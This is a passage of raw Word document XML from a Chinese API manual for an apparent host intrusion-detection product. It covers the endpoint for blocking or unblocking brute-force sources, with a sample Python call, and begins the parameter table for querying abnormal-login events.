      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881C57A"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727"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2348"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="6D845E1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58191E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06C6B6FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1066D5C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5423691D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="283EDE76" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A1B83E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CA04168" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AFA22BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3912FB48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2FE88BC4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EE91E86" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2044C35D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0907819C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0003E158" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>操作类型:0-解封;1-封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0746AAC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D129462" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "block": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD34E02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216448CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "block": 6,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4951B7"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727"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="2185"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="22652AE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AD09546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFB7653" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FF70419" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BD752F7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E2B57AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FCF626F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="52002D51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="523EE7C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E96C611" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3939493A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65BB01BF" w14:textId="0CCAF36D" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "暴力破解封停状态" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>封</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>停状态</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="524DE27B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F65CD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t># 入侵检测-暴力破解-封停/解封操作接口调用的代码示例(python)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack_block</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutecrack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/block" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'id': 'tFU7aUo3o5w7GDPlJqQfMA==', 'block': 1}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">"POST", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56540A2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71176664" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>当agent</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线的时候，接口返回500， agent</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>在线。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C008CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>处于封停/解封中的项不能再进行封停/解封操作，否则会抛出异常及提示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471EB80D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="_Toc115166212"/>
      <w:bookmarkStart w:id="276" w:name="异常登录"/>
      <w:bookmarkEnd w:id="268"/>
      <w:bookmarkEnd w:id="274"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>异常登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
    </w:p>
    <w:p w14:paraId="0087B62D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="_Toc115166213"/>
      <w:bookmarkStart w:id="278" w:name="查询结果-3"/>
      <w:r>
        <w:t>查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
    </w:p>
    <w:p w14:paraId="71647B97" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录上报事件的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6463F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B219D9A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A7F810"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173"/>
        <w:gridCol w:w="1273"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="4571"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D7F7A7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DE42C7F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="258BBDD5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFE68F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="470DF511" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3321D7CA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E8B3481" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D69EEBC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43F89324" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="323194AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4BED88AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34602E89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68E6028D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>DateRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFCD1AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30050715" w14:textId="60E946C8" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录时间，格式参考</w:t>
            </w:r>
            <w:hyperlink w:anchor="通用get请求参数类型及说明">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>通用Get请求参数类型及说明</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="54356A3C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72A0F25E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="237EEFB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57BF2B27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BE751AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常登录类型:2-异常IP;3-异常区域;4-异常时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="190052D5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20395A76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53503277" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46ACD1A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF3C603" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E4C593B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C768507" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uname</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29DA3A9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340716B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EFF2C1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FB99F18" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02082094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD66FDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="198E1734" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B1CECE9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="513C06A3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F1921EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72376280" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51CACDCC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C45EA57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
